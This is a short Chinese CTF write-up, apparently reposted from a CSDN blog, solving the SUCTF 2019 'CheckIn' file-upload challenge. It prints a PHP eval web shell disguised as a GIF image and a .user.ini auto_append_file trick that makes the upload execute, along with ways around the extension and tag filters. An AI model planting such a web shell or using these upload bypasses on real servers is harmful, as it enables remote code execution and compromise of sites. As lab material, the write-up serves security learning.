其他分享
首页 > 其他分享> > [SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1

作者:互联网

打开环境
在这里插入图片描述
发现好像是个文件上传漏洞发现可以传jgp格式的图
但是传被过滤的的就会出现
在这里插入图片描述
这里就要了解一个函数
exif_imagetype
函数简介
其实就是一个类型的比较
所以这里和其他文件上传设置的黑白名单没两样
可以直接魔术头绕过就行
然后进过测试发现文件名带ph的被过滤了所以用phtm后缀l解析不行了
文件内容有<?的被过滤了
所以这里这样绕过
2.jpg

GIF89a
<script language="php"> eval($_POST[1]);</script>

在这里插入图片描述
上传成功了 但是没有被解析 然后这块的又没有文件包含漏洞,所以不容易被解析 所以不能用工具链接
这里就要了解另一个知识点了
神秘的.user.ini文件
先配置.user.ini再上传在它目录下进行解析
.user.ini

GIF89a
auto_append_file=1.jpg
 

在这里插入图片描述

然后再上传木马
在这里插入图片描述
工具链接在根目录寻找flag
也能在木马语句中直接抓flag
在这里插入图片描述
这样直接访问文件位置得到flag
在这里插入图片描述
希望这篇文章能帮到你!

标签:SUCTF,文件,CheckIn,flag,2019,ini,解析,上传,user
来源: https://blog.csdn.net/qq_53460654/article/details/116274805